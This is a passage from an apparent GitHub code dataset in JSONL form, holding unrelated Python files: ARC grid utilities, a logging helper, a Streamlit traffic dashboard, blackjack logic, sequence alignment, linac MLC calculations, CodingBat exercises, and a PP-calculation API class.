1));\n\n # Minor ticks\n ax.set_xticks(np.arange(-.5, width, 1), minor=True);\n ax.set_yticks(np.arange(-.5, height, 1), minor=True);\n\n # Gridlines based on minor ticks\n ax.grid(which='minor', color='w', linestyle='-', linewidth=1)\n \n plt.xticks([])\n plt.yticks([])\n\ndef get_object_position_tags(obj_pos_t, root_shape_t):\n position_tags = []\n # using the first two bit of determine whether attach to left or up\n if obj_pos_t[0] == 0:\n position_tags.append(\"upper\")\n if obj_pos_t[1] == 0:\n position_tags.append(\"left\")\n if (obj_pos_t[0]+obj_pos_t[2]) == root_shape_t[0]:\n position_tags.append(\"lower\")\n if (obj_pos_t[1]+obj_pos_t[3]) == root_shape_t[1]:\n position_tags.append(\"right\")\n return position_tags\n\ndef randint_exclude(l, u, e):\n r = e[0]\n while r in e:\n r = random.randint(l, u)\n return r\n\ndef single_task_obj_parser(task_id):\n \"\"\"\n return a list of objects contained in this task.\n \"\"\"\n task_objs = []\n task_id += \".json\"\n (inputs, _), (_, _) = load_task(task_id, isplot=False)\n # parse objects in 3 ways\n inputs_graph = parse_obj(inputs)\n for i in range(len(inputs_graph[0])):\n root_shape_t = inputs_graph[0][i].get_node_value(\"Image\").shape\n for obj_n in inputs_graph[0][i].objs:\n obj_img_t = inputs_graph[0][i].get_node_value(obj_n)\n obj_pos_t = inputs_graph[0][i].get_node_value(obj_n.split(\":\")[0]+\"^pos:Pos\")\n obj_position_tags = get_object_position_tags(obj_pos_t, root_shape_t)\n obj_fmt = Object(obj_img_t, obj_position_tags)\n task_objs.append(obj_fmt)\n \n inputs_graph = parse_obj(inputs, is_colordiff=False)\n for i in range(len(inputs_graph[0])):\n root_shape_t = inputs_graph[0][i].get_node_value(\"Image\").shape\n for obj_n in inputs_graph[0][i].objs:\n obj_img_t = inputs_graph[0][i].get_node_value(obj_n)\n obj_pos_t = inputs_graph[0][i].get_node_value(obj_n.split(\":\")[0]+\"^pos:Pos\")\n obj_position_tags = get_object_position_tags(obj_pos_t, root_shape_t)\n obj_fmt = Object(obj_img_t, obj_position_tags)\n task_objs.append(obj_fmt)\n \n inputs_graph = parse_obj(inputs, is_diag=False)\n for i in range(len(inputs_graph[0])):\n root_shape_t = inputs_graph[0][i].get_node_value(\"Image\").shape\n for obj_n in inputs_graph[0][i].objs:\n obj_img_t = inputs_graph[0][i].get_node_value(obj_n)\n obj_pos_t = inputs_graph[0][i].get_node_value(obj_n.split(\":\")[0]+\"^pos:Pos\")\n obj_position_tags = get_object_position_tags(obj_pos_t, root_shape_t)\n obj_fmt = Object(obj_img_t, obj_position_tags)\n task_objs.append(obj_fmt)\n return task_objs\n\n# relation parser as we need for multihop reasonings\ndef SameShape(image1, pos1, image2, pos2):\n if np.prod(image1.shape) == 0:\n return False\n if np.prod(image2.shape) == 0:\n return False\n if image1.shape != image2.shape:\n return False\n else:\n return (image1.bool() == image2.bool()).all()\n\ndef SameColor(image1, pos1, image2, pos2):\n color1 = -1 if len(image1.unique()) > 2 else image1.unique()[0]\n color2 = -1 if len(image2.unique()) > 2 else image2.unique()[0]\n if image1.unique()[0] == 0:\n color1 = image1.unique()[1]\n if image2.unique()[0] == 0:\n color2 = image2.unique()[1]\n \n if color1 == -1 or color2 == -1:\n return False\n else:\n return color1 == color2\n\ndef SameAll(image1, pos1, image2, pos2):\n if np.prod(image1.shape) == 0:\n return False\n if np.prod(image2.shape) == 0:\n return False\n if image1.shape != image2.shape:\n return False\n else:\n return (image1 == image2).all()\n\ndef SameRow(image1, pos1, image2, pos2):\n pos1 = (pos1[0], pos1[1], image1.shape[0], image1.shape[1])\n pos2 = (pos2[0], pos2[1], image2.shape[0], image2.shape[1])\n if pos1[0] == pos2[0] and pos1[2] == pos2[2]:\n return True\n else:\n return False\n\ndef SameCol(image1, pos1, image2, pos2):\n pos1 = (pos1[0], pos1[1], image1.shape[0], image1.shape[1])\n pos2 = (pos2[0], pos2[1], image2.shape[0], image2.shape[1])\n if pos1[1] == pos2[1] and pos1[3] == pos2[3]:\n return True\n else:\n return False\n\ndef IsInside(image1, pos1, image2, pos2):\n \"\"\"Whether obj1 is inside obj2.\"\"\"\n pos1 = (pos1[0], pos1[1], image1.shape[0], image1.shape[1])\n pos2 = (pos2[0], pos2[1], image2.shape[0], image2.shape[1])\n if pos1[0] > pos2[0] and pos1[1] > pos2[1] and pos1[0] + pos1[2] < pos2[0] + pos2[2] and pos1[1] + pos1[3] < pos2[1] + pos2[3]:\n image2_patch = image2[int(pos1[0] - pos2[0]): int(pos1[0] + pos1[2] - pos2[0]), \n int(pos1[1] - pos2[1]): int(pos1[1] + pos1[3] - pos2[1])]\n overlap = (image1 != 0) & (image2_patch != 0)\n if overlap.any():\n return False\n else:\n return True\n else:\n return False\n \ndef IsNonOverlapXY(image1, pos1, image2, pos2):\n \"\"\"Whether obj1 is inside obj2.\"\"\"\n rec1 = (pos1[0], pos1[1], pos1[0]+image1.shape[0], pos1[1]+image1.shape[1])\n rec2 = (pos2[0], pos2[1], pos2[0]+image2.shape[0], pos2[1]+image2.shape[1])\n def intersect(p_left, p_right, q_left, q_right):\n return min(p_right, q_right) > max(p_left, q_left)\n if (intersect(rec1[0], rec1[2], rec2[0], rec2[2]) & \\\n intersect(rec1[1], rec1[3], rec2[1], rec2[3])):\n return False\n return True\n\ndef IsTouch(image1, pos1, image2, pos2):\n \"\"\"Whether the \"obj\"'s leftmost/rightmost/upmost/downmost part touches any other pixels (up, down, left, right) or boundary in the \"image\".\"\"\"\n pos1 = (pos1[0], pos1[1], image1.shape[0], image1.shape[1])\n pos2 = (pos2[0], pos2[1], image2.shape[0], image2.shape[1])\n obj_indices = get_indices(\n image1,\n pos1,\n includes_self=False,\n includes_neighbor=True,\n )\n obj2_indices = get_indices(image2, pos2)\n is_torch = len(set(obj_indices).intersection(set(obj2_indices))) > 0\n return is_torch","repo_name":"frankaging/BabyARC","sub_path":"code/dataset/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":12902,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"14690503478","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Author : EXP\n# @Time : 2020/4/26 13:14\n# @File : log.py\n# -----------------------------------------------\n# 日志\n# -----------------------------------------------\n\nimport traceback\nimport logging\nfrom logging.handlers import TimedRotatingFileHandler\nfrom src.cfg.env import PRJ_DIR\n\nRUN_LOG = '%s/log/run.log' % PRJ_DIR\nERR_LOG = '%s/log/err.log' % PRJ_DIR\n\n\ndef init(runlog = RUN_LOG, errlog = ERR_LOG):\n \"\"\"\n 初始化日志配置 (只需在程序入口调用一次)\n :return: None\n \"\"\"\n\n # 全局配置\n logger = logging.getLogger()\n logger.setLevel(\"DEBUG\")\n BASIC_FORMAT = \"%(asctime)s [%(levelname)s] : %(message)s\"\n DATE_FORMAT = \"%Y-%m-%d %H:%M:%S\"\n formatter = logging.Formatter(BASIC_FORMAT, DATE_FORMAT)\n\n # 输出到控制台的 handler\n ch = logging.StreamHandler()\n ch.setFormatter(formatter)\n ch.setLevel(\"DEBUG\")\n logger.addHandler(ch)\n\n # 输出到运行日志文件的 handler\n fh = TimedRotatingFileHandler(filename=runlog, when=\"MIDNIGHT\", interval=1, backupCount=7)\n fh.setFormatter(formatter)\n fh.setLevel(\"INFO\")\n logger.addHandler(fh)\n\n # 输出到异常日志文件的 handler\n exfh = TimedRotatingFileHandler(filename=errlog, when=\"MIDNIGHT\", interval=1, backupCount=7)\n exfh.setLevel(\"ERROR\")\n exfh.setFormatter(formatter)\n logger.addHandler(exfh)\n\n # 禁用第三方日志\n # logging.getLogger(\"requests\").setLevel(logging.FATAL)\n\n\n\ndef debug(msg):\n \"\"\"\n 打印调试信息\n :param msg: 日志信息\n :return: None\n \"\"\"\n logging.debug(msg)\n\n\ndef info(msg):\n \"\"\"\n 打印正常信息\n :param msg: 日志信息\n :return: None\n \"\"\"\n logging.info(msg)\n\n\ndef warn(msg):\n \"\"\"\n 打印警告信息\n :param msg: 日志信息\n :return: None\n \"\"\"\n logging.warning(msg)\n\n\ndef error(msg):\n \"\"\"\n 打印异常信息和异常堆栈\n :param msg: 日志信息\n :return: None\n \"\"\"\n logging.exception(msg)\n logging.exception(traceback.format_exc())\n","repo_name":"Mr-xn/threat-broadcast","sub_path":"src/utils/log.py","file_name":"log.py","file_ext":"py","file_size_in_byte":2071,"program_lang":"python","lang":"en","doc_type":"code","stars":149,"dataset":"github-code","pt":"72"} +{"seq_id":"6568376663","text":"SCREEN_HEIGHT = 10 * 16\nSCREEN_WIDTH = 10 * 16\n\nKIND_POSTION = (0, 0, \"Potion\", 5, 10)\nKIND_BOMB = (16, 0, \"Bomb\", 5, 30)\nKIND_SHIELD = (32, 0, \"Shield\", 5, 50)\nKIND_SWORD = (48, 0, \"Sword\", 5, 75)\nKIND_HELMET = (48, 16, \"Helmet\", 5, 100)\nKIND_APPLE = (0, 16, \"Apple\", 5 ,125)\nKIND_BOW = (16, 16, \"Bow\", 25, 10)\nKIND_DIAMOND = (32, 16, \"Diamond\", 25, 30)\n\nMAX_AMOUNT = 8\nMIN_AMOUNT = 1\nMAX_KIND = 5\n\nSE_ERROR = 0\nSE_SELECT = 5\nMUSIC_ADD = 0\nMUSIC_USE = 1\nMUSIC_BGM = 2","repo_name":"leocody/RPG_Inventory","sub_path":"constant.py","file_name":"constant.py","file_ext":"py","file_size_in_byte":468,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"21625726977","text":"#!/usr/bin/env python\n# coding: utf-8\n\n\nimport streamlit as st\nimport pandas as pd\nimport numpy as np\nimport datetime\nimport plotly.express as px\n\n\ndef app():\n\n #import dataset\n df= pd.read_excel('C:/Users/HP/Downloads/ByWeekSearchRealTraffic.xlsx')\n\n #FILTER\n st.sidebar.header('FILTERS')\n\n #filter years\n years = list(df['Year'].drop_duplicates())\n year_choice = st.sidebar.multiselect('Choose the year(s):', years, default=years)\n df = df[df['Year'].isin(year_choice)]\n\n #filter destination\n destinations = list(df['Destination'].drop_duplicates())\n destination_choice = st.sidebar.multiselect('Choose the destination(s):', destinations, default=destinations)\n df = df[df['Destination'].isin(destination_choice)]\n\n #filter airport\n airports = list(df['Airport'].drop_duplicates())\n airport_choice = st.sidebar.multiselect('Choose the airport(s):', airports, default=airports)\n df = df[df['Airport'].isin(airport_choice)]\n\n #filter directionality\n directionalities = list(df['Directionality'].drop_duplicates())\n directionality_choice = st.sidebar.multiselect('Choose the directionality(ies):', directionalities, default=directionalities)\n df = df[df['Directionality'].isin(directionality_choice)]\n\n\n st.markdown('## Comparative Real Air Traffic / Skyscanner Searches')\n st.markdown(\"### - By weeks\")\n df['diff'] = df['RealTraffic/RealTraffic2019'] - df['Searches/Searches2019']\n \n #KPIs\n st.markdown(\"#### Some KPIs\")\n st.markdown('The percentage difference between the number of searches for a travel date and the number of passengers for that travel date')\n\n chart_data = pd.DataFrame(df[[\"NumWeek\",\"diff\"]].groupby(['NumWeek']).sum().add_suffix('').reset_index())\n col1, col2, col3 = st.columns(3)\n col1.metric(\"Mean (en %)\", round(chart_data[\"diff\"].mean(),2))\n col2.metric(\"Max (en %)\", round(chart_data[\"diff\"].max(),2))\n col3.metric(\"Min (en %)\", round(chart_data[\"diff\"].min(),2))\n\n #chart line by weeks\n st.markdown('#### Real Air Traffic - Skyscanner Searches compared to Real Air Traffic - Skyscanner Searches 2019 ')\n #chart line by days\n chart_data = pd.DataFrame(df[[\"NumWeek\",\"RealTraffic/RealTraffic2019\",\"Searches/Searches2019\",\"RealTraffic-Searches 2019\"]].groupby(['NumWeek']).mean().add_suffix('').reset_index())\n chart_data = chart_data.rename(columns={\"RealTraffic/RealTraffic2019\": \"Real Traffic compared to 2019 Real Air Traffic\", \"Searches/Searches2019\": \"Searches compared to 2019 Searches\", \"RealTraffic-Searches 2019\" : \"Real Traffic and Searches 2019\"})\n chart_data = px.line(chart_data, x=\"NumWeek\", y=[\"Real Traffic compared to 2019 Real Air Traffic\",\"Searches compared to 2019 Searches\",\"Real Traffic and Searches 2019\"], labels=dict(NumWeek=\"Week Travel\"))\n chart_data = chart_data.update_xaxes(range=[1, 53])\n chart_data = chart_data.update_layout(legend=dict(yanchor=\"top\",y=0.99,xanchor=\"left\",x=0.01))\n st.plotly_chart(chart_data)\n\n\n st.markdown(\"### - By months\")\n df1= pd.read_excel('C:/Users/HP/Downloads/searchdirectsmonth.xlsx')\n\n #KPIs\n st.markdown(\"#### Some KPIs\")\n st.markdown('The percentage difference between the number of searches for a travel date and the number of passengers for that travel date')\n\n df1['diff'] = df1['RealTraffic%2019ByMonth'] - df1['Searches%2019ByMonth']\n chart_data = pd.DataFrame(df1[[\"Month\",\"diff\"]].groupby(['Month']).sum().add_suffix('').reset_index())\n col1, col2, col3 = st.columns(3)\n col1.metric(\"Mean (en %)\", round(chart_data[\"diff\"].mean(),2))\n col2.metric(\"Max (en %)\", round(chart_data[\"diff\"].max(),2))\n col3.metric(\"Min (en %)\", round(chart_data[\"diff\"].min(),2))\n\n #chart line by weeks\n st.markdown('#### Real Air Traffic - Skyscanner Searches compared to Real Air Traffic - Skyscanner Searches 2019 ')\n #chart line by days\n chart_data = pd.DataFrame(df1[[\"Month\",\"RealTraffic%2019ByMonth\",\"Searches%2019ByMonth\",\"Total Real Traffic / Searches 2019\"]].groupby(['Month']).mean().add_suffix('').reset_index())\n chart_data = chart_data.rename(columns={\"RealTraffic%2019ByMonth\": \"Real Traffic compared to 2019 Real Air Traffic\", \"Searches%2019ByMonth\": \"Searches compared to 2019 Searches\", \"Total Real Traffic / Searches 2019\" : \"Real Traffic and Searches 2019\"})\n chart_data = px.line(chart_data, x=\"Month\", y=[\"Real Traffic compared to 2019 Real Air Traffic\",\"Searches compared to 2019 Searches\",\"Real Traffic and Searches 2019\"], labels=dict(Month=\"Month Travel\"))\n chart_data = chart_data.update_xaxes(range=[1, 12])\n chart_data = chart_data.update_layout(legend=dict(yanchor=\"top\",y=0.99,xanchor=\"left\",x=0.01))\n st.plotly_chart(chart_data)\n\n\n\n st.markdown(\"### - By holidays\")\n\n df1= pd.read_excel('C:/Users/HP/Downloads/Searchesdirectsholidays.xlsx')\n df1['diff'] = df1['Real Traffic'] - df1['Searches']\n \n #KPIs\n st.markdown(\"#### Some KPIs\")\n st.markdown('The percentage difference between the number of searches for a travel date and the number of passengers for that travel date')\n\n chart_data = pd.DataFrame(df1[[\"VacancesZoneC\",\"diff\"]].groupby(['VacancesZoneC']).sum().add_suffix('').reset_index()) \n col1, col2, col3 = st.columns(3)\n col1.metric(\"Mean (en %)\", round(chart_data[\"diff\"].mean(),2))\n col2.metric(\"Max (en %)\", round(chart_data[\"diff\"].max(),2))\n col3.metric(\"Min (en %)\", round(chart_data[\"diff\"].min(),2))\n\n #chart line by weeks\n st.markdown('#### Real Air Traffic - Skyscanner Searches compared to Real Air Traffic - Skyscanner Searches 2019 ')\n #chart line by days\n chart_data = pd.DataFrame(df1[[\"VacancesZoneC\",\"Real Traffic\",\"Searches\",\"Total Real Traffic / Searches 2019\"]].groupby(['VacancesZoneC']).mean().add_suffix('').reset_index())\n chart_data = chart_data.rename(columns={\"Real Traffic\": \"Real Traffic compared to 2019 Real Air Traffic\", \"Searches\": \"Searches compared to 2019 Searches\", \"Total Real Traffic / Searches 2019\" : \"Real Traffic and Searches 2019\"})\n chart_data = px.line(chart_data, x=\"VacancesZoneC\", y=[\"Real Traffic compared to 2019 Real Air Traffic\",\"Searches compared to 2019 Searches\",\"Real Traffic and Searches 2019\"], labels=dict(VacancesZoneC=\"Holidays Travel\"))\n chart_data = chart_data.update_layout(legend=dict(yanchor=\"top\",y=0.99,xanchor=\"left\",x=0.01))\n st.plotly_chart(chart_data)\n \n\n \n\n\n\n\n\n\n","repo_name":"OlfaLmt/StreamlitProject","sub_path":"StreamlitProject/StreamlitProject4.py","file_name":"StreamlitProject4.py","file_ext":"py","file_size_in_byte":6405,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"40701154598","text":"import Player\r\nclass Round(object):\r\n \"\"\"description of class\"\"\"\r\n players = None\r\n deck = []\r\n bets = {}\r\n scores = {}\r\n dealer = None\r\n\r\n def __init__(self, players, deck):\r\n self.players = players\r\n self.deck = deck\r\n \r\n for player in self.players:\r\n self.bets[player] = 0\r\n self.scores[player] = 0\r\n if player.is_dealer:\r\n self.dealer = player\r\n\r\n def play_out_round(self):\r\n self.place_bets()\r\n self.initial_deal()\r\n\r\n for player in self.players:\r\n print(player.name + \"(bet = \" + str(self.bets[player]) + \"): \" + str(player.hand) + \": \" + str(player.compute_hand_total()))\r\n\r\n self.continue_round()\r\n\r\n self.dealers_turn()\r\n \r\n for player in self.players:\r\n print(player.name + \": \" + str(player.hand) + \": \" + str(player.compute_hand_total()))\r\n\r\n self.determine_payouts()\r\n\r\n self.reset()\r\n\r\n def initial_deal(self):\r\n for player in self.players:\r\n player.deal_shown_card(self.deck)\r\n\r\n for player in self.players:\r\n if not player.is_dealer:\r\n player.deal_shown_card(self.deck)\r\n else:\r\n player.deal_hidden_card(self.deck)\r\n\r\n def continue_round(self):\r\n for player in self.players:\r\n while not player.hold and not player.is_dealer and not player.over:\r\n if player.hand_can_split():\r\n split_status = input(player.name + \", your hand is: \" + str(player.hand) + \". With a total value of: \" + str(player.hand_total) + \". Split? (Y/N)\\r\\n\")\r\n if split_status.capitalize() == \"Y\":\r\n player.split(self.bets[player], self.deck) #TODO\r\n else:\r\n self.scores[player] = player.manual_play(self.deck) #TODO\r\n player.hold = True\r\n\r\n def continue_round_optimally(self):\r\n for player in self.players:\r\n if not player.is_dealer and not player.over:\r\n return\r\n\r\n def optimal_hit_or_stay(self, player):\r\n dealer = self.dealer\r\n shown_card = dealer.hand[0][0]\r\n if player.hand_is_hard():\r\n return #TODO\r\n\r\n def dealers_turn(self):\r\n dealer = self.dealer\r\n dealer.show_hidden_card()\r\n while not dealer.hold and not dealer.over:\r\n hit_status = input(dealer.name + \", your hand is: \" + str(dealer.hand) + \". With a total value of: \" + str(dealer.compute_hand_total()) + \". Hit or stay? (H/S)\\r\\n\")\r\n if hit_status == \"H\":\r\n dealer.deal_shown_card(self.deck)\r\n if dealer.over:\r\n print(dealer.name + \", you went over with a hand of: \" + str(dealer.hand))\r\n else:\r\n print(dealer.name + \", you are staying with a hand total of: \" + str(dealer.compute_hand_total()))\r\n dealer.hold = True\r\n self.scores[self.dealer] = self.dealer.compute_hand_total()\r\n \r\n\r\n def determine_payouts(self):\r\n for player in self.players:\r\n if not player.is_dealer:\r\n if (self.scores[player] > self.scores[self.dealer] and not player.over) or (not player.over and self.dealer.over):\r\n player.wins(self.bets[player])\r\n print(player.name + \" has won \" + str(self.bets[player]) + \" dollars.\")\r\n elif (self.scores[player] == self.scores[self.dealer] and not player.over):\r\n player.pushes(self.bets[player])\r\n print(\"PUSH! \" + player.name + \" has tied and is returned their bet of \" + str(self.bets[player]) + \" dollars.\")\r\n else:\r\n print(player.name + \" has lost \" + str(self.bets[player]) + \" dollars.\")\r\n\r\n def place_bets(self):\r\n for player in self.players:\r\n if not player.is_dealer:\r\n self.bets[player] = player.place_bet()\r\n\r\n def reset(self):\r\n for player in self.players:\r\n player.reset()","repo_name":"nhomka/Blackjack-Card-Counting","sub_path":"Round.py","file_name":"Round.py","file_ext":"py","file_size_in_byte":4116,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"43455214075","text":"from django.conf import settings\nfrom django.core.mail import EmailMultiAlternatives\nfrom .models import User\n\n\ndef _send_email_registrations(\n registration_subject: str,\n text_content: str,\n html_content: str,\n from_email: str,\n email_list: list,\n bcc_email: str,\n) -> None:\n \"\"\"\n send email registration notification\n \"\"\"\n if not settings.EMAIL_SEND:\n return \"mocking email sending\"\n msg = EmailMultiAlternatives(\n registration_subject, text_content, from_email, email_list, bcc=bcc_email\n )\n msg.attach_alternative(html_content, \"text/html\")\n msg.send()\n\n\ndef _check_user_if_in_platform(email: str) -> bool:\n \"\"\"\n checks if user exists\n \"\"\"\n return User.objects.filter(email=email).exists()\n","repo_name":"ausome-maps/TherapEase","sub_path":"api/apps/core/users/actions.py","file_name":"actions.py","file_ext":"py","file_size_in_byte":762,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"72"} +{"seq_id":"34332713920","text":"import numpy as np\n\nseq1 = 'RGSRRPGQPP'\nseq2 = 'RGQGRRWRPP'\n\nmainm = np.zeros((len(seq1)+1, len(seq2)+1))\nmatchm = np.zeros((len(seq1), len(seq2)))\n\nreward = 1\nmism = -1\ngappen = -2\n\nfor i in range(len(seq1)):\n for j in range(len(seq2)):\n if seq1[i] == seq2[j]:\n matchm[i][j] = reward\n else:\n matchm[i][j] = mism\n\n#init\nfor i in range(len(seq1)+1):\n mainm[i][0] = i*gappen\nfor j in range(len(seq2)+1):\n mainm[0][j] = j*gappen\n#fill\nfor i in range(1, len(seq1)+1):\n for j in range(1, len(seq2) + 1):\n mainm[i][j] = max(mainm[i-1][j-1]+matchm[i-1][j-1],\n mainm[i-1][j]+gappen,\n mainm[i][j-1]+gappen)\n#traceback\nal_seq1 = ''\nal_seq2 = ''\nls1 = len(seq1)\nls2 = len(seq2)\n\nwhile ls1>0 and ls2>0:\n if ls1>0 and ls2>0 and mainm[ls1][ls2] == mainm[ls1-1][ls2-1] + matchm[ls1-1][ls2-1]:\n al_seq1 = seq1[ls1-1] + al_seq1\n al_seq2 = seq2[ls2-1] + al_seq2\n ls1 -= 1\n ls2 -= 1\n elif ls1>0 and mainm[ls1][ls2] == mainm[ls1-1][ls2] + gappen:\n al_seq1 = seq1[ls1 - 1] + al_seq1\n al_seq2 = \"_\" + al_seq2\n ls1 -= 1\n else:\n al_seq1 = \"_\" + al_seq1\n al_seq2 = seq2[ls2 - 1] + al_seq2\n ls2 -= 1\n\nprint(al_seq1)\nprint(al_seq2)\n\n\n","repo_name":"liquidbrainisstrain/ouroboros","sub_path":"ouroboros/nw-alg.py","file_name":"nw-alg.py","file_ext":"py","file_size_in_byte":1291,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"38674478922","text":"# -*- coding: utf-8 -*-\n\"\"\"\nDecide the range of leaf numbers need to open based on the input fs\n\"\"\"\n__author__ = 'Kanru Xie'\n\nimport globalvar as glv\n\n\ndef mlc_open_leaves():\n mlc_y = glv.convert_float('mlc y')\n global open_l, open_r\n '''\n Had issues of the initial leave numbers. \n open_l should start from 30 and 46, open_r should start from 31 and 15\n '''\n if 0 <= mlc_y < 8: # Center quarter leaves cover 8cm in total.\n open_l = 30 + int((mlc_y / 2) // 0.25) # Leaf number on left side of open field.\n open_r = 31 - int((mlc_y / 2) // 0.25) # Leaf number on right side of open field.\n elif 8 <= mlc_y < 21: # Half leaves take from 4cm to 10.5cm on one side.\n open_l = 46 + int(((mlc_y / 2) - 4) // 0.5)\n open_r = 15 - int(((mlc_y / 2) - 4) // 0.5)\n else: # The rest 0.5cm on each side are outboard leaves.\n open_l = 60\n open_r = 1\n\n\ndef mlc_open_distance(leaf_number): # either half of x- opening (opened), or 0 (closed).\n mlc_x = glv.convert_float('mlc x')\n # mlc_x is the size of the open field at 100cm ssd\n # while x_distance is the actual mlc movement in space at 51cm ssd\n x_distance = ''\n mlc_open_leaves()\n if open_r <= (leaf_number % 100) <= open_l: # 2 banks, leaves numbered as 1xx and 2xx.\n if leaf_number // 100 == 1: # Bank 1 moves in +x direction\n x_distance = mlc_x * 51 / 200\n elif leaf_number // 100 == 2: # Bank 2 moves in -x direction\n x_distance = - mlc_x * 51 / 200\n else:\n x_distance = 0\n # out of field leaves, closed\n return x_distance\n","repo_name":"UToledoVLinac/Virtual_Linac","sub_path":"main/input_file_creator/write_cell_card/mlc_open.py","file_name":"mlc_open.py","file_ext":"py","file_size_in_byte":1617,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"70037869352","text":"'''\nThe parameter weekday is True if it is a weekday, and the parameter vacation is True if we are on vacation.\nWe sleep in if it is not a weekday or we're on vacation. Return True if we sleep in.\n'''\ndef sleep_in(weekday, vacation):\n if (weekday is False and vacation is False):\n return True\n elif (weekday is True and vacation is False):\n return False\n elif (weekday is False and vacation is True):\n return True\n elif (weekday is True and vacation is True):\n return True\n \n \n'''\nWe have two monkeys, a and b, and the parameters a_smile and b_smile indicate if each is smiling.\nWe are in trouble if they are both smiling or if neither of them is smiling. Return True if we are in trouble.\n'''\ndef monkey_trouble(a_smile, b_smile):\n if (a_smile is b_smile):\n return True\n else:\n return False \n \n \n'''\nGiven two int values, return their sum. Unless the two values are the same, then return double their sum.\n'''\ndef sum_double(a, b):\n if (a != b):\n return a + b\n else:\n return (a + b) * 2 \n \n \n'''\nGiven an int n, return the absolute difference between n and 21, except return double the absolute difference if n is over 21.\n'''\ndef diff21(n):\n if (n <= 21):\n return (abs(n - 21))\n else:\n return (abs(n - 21)) * 2\n \n \n'''\nWe have a loud talking parrot. The \"hour\" parameter is the current hour time in the range 0..23.\nWe are in trouble if the parrot is talking and the hour is before 7 or after 20. Return True if we are in trouble.\n'''\ndef parrot_trouble(talking, hour):\n if (talking is True and (hour < 7 or hour > 20)):\n return True\n else:\n return False\n \n \n'''\nGiven 2 ints, a and b, return True if one if them is 10 or if their sum is 10.\n'''\ndef makes10(a, b):\n if (a == 10 or b == 10 or a + b == 10):\n return True\n else:\n return False \n \n \n'''\nGiven an int n, return True if it is within 10 of 100 or 200. Note: abs(num) computes the absolute value of a number.\n'''\ndef near_hundred(n):\n a = 100 - n\n b = 200 - n\n return abs(a) <= 10 or abs(b) <= 10\n \n \n'''\nGiven 2 int values, return True if one is negative and one is positive.\nExcept if the parameter \"negative\" is True, then return True only if both are negative.\n'''\ndef pos_neg(a, b, negative):\n if (a < 0 and b >= 0 and negative is not True):\n return True\n elif (b < 0 and a >= 0 and negative is not True):\n return True\n elif (a < 0 and b < 0 and negative is True):\n return True\n else:\n return False\n \n \n'''\nGiven a string, return a new string where \"not \" has been added to the front.\nHowever, if the string already begins with \"not\", return the string unchanged.\n'''\ndef not_string(str):\n if (str[:3] == 'not'):\n return str\n else:\n return 'not ' + str;\n \n \n'''\nGiven a non-empty string and an int n, return a new string where the char at index n has been removed.\nThe value of n will be a valid index of a char in the original string (i.e. n will be in the range 0..len(str)-1 inclusive).\n'''\ndef missing_char(st, n):\n if (n == 0):\n return st[1:]\n else:\n return st[0:n] + st[n + 1:]\n \n \n'''\nGiven a string, return a new string where the first and last chars have been exchanged.\n'''\ndef front_back(str):\n if (len(str) == 1 or len(str) == 0):\n return str\n elif (len(str) == 2):\n return str[-1] + str[0]\n else:\n return str[-1] + str[1:-1] + str[0]\n \n\n'''\nGiven a string, we'll say that the front is the first 3 chars of the string.\nIf the string length is less than 3, the front is whatever is there.\nReturn a new string which is 3 copies of the front.\n'''\ndef front3(str):\n if (len(str) >= 3):\n return str[:3] * 3\n else:\n return str * 3\n","repo_name":"insotriplesix/dp","sub_path":"challenges/coding-bat/python/warmup-1.py","file_name":"warmup-1.py","file_ext":"py","file_size_in_byte":3693,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"72"} +{"seq_id":"14167389848","text":"try:\n import ujson as json\nexcept ImportError:\n import json\nimport json as stdjson\nimport logging\nfrom typing import Dict, Any, List, Union, Optional\n\nimport aiohttp\nimport async_timeout\n\nfrom constants.game_modes import GameMode\nfrom constants.mods import Mod\n\n\nclass LetsApiError(Exception):\n pass\n\n\nclass FatalLetsApiError(LetsApiError):\n pass\n\n\nclass LetsPPResponse:\n def __init__(self, **kwargs):\n self.song_name: str = kwargs[\"song_name\"]\n self._pp: Union[List[float], float] = kwargs[\"pp\"]\n self.length: int = kwargs[\"length\"]\n self.stars: float = kwargs[\"stars\"]\n self.ar: float = kwargs[\"ar\"]\n self.bpm: int = kwargs[\"bpm\"]\n self.mods: Mod = kwargs[\"mods\"]\n self.accuracy: Optional[float] = kwargs[\"accuracy\"]\n self.game_mode: GameMode = GameMode(kwargs[\"game_mode\"])\n\n @property\n def has_multiple_pp(self) -> bool:\n return type(self._pp) is list\n\n @property\n def pp(self) -> float:\n if self.has_multiple_pp:\n raise ValueError(\"This response has multiple PP. Please use pp_100, pp_99, pp_98 or pp_95.\")\n return self._pp\n\n @property\n def pp_100(self) -> float:\n return self._pp[0] if self.has_multiple_pp else self._pp\n\n @property\n def pp_99(self) -> float:\n return self._pp[1] if self.has_multiple_pp else None\n\n @property\n def pp_98(self) -> float:\n return self._pp[2] if self.has_multiple_pp else None\n\n @property\n def pp_95(self) -> float:\n return self._pp[3] if self.has_multiple_pp else None\n\n # @property\n # def primary_game_mode(self) -> GameMode:\n # return next((GameMode(i) for v, i in enumerate(self._pp) if v is not None and v > 0), GameMode.STANDARD)\n\n @property\n def modded_ar(self) -> float:\n if self.mods & Mod.EASY:\n return max(0.0, self.ar / 2)\n if self.mods & Mod.HARD_ROCK:\n return min(10.0, self.ar * 1.4)\n return self.ar\n\n def __str__(self) -> str:\n message = f\"{self.song_name}\"\n message += f\" <{str(self.game_mode)}>\"\n message += f\"+{str(self.mods)}\" if self.mods != Mod.NO_MOD else \"\"\n message += \" \"\n if self.has_multiple_pp:\n message += \" | \".join(f\"{perc}%: {x:.2f}pp\" for perc, x in zip((100, 99, 98, 95), self._pp))\n else:\n message += f\"{self.accuracy:.2f}%: {self.pp:.2f}pp\"\n original_ar = self.ar\n mod_ar = self.modded_ar\n message += \\\n f\" | ♪ {self.bpm}\" \\\n 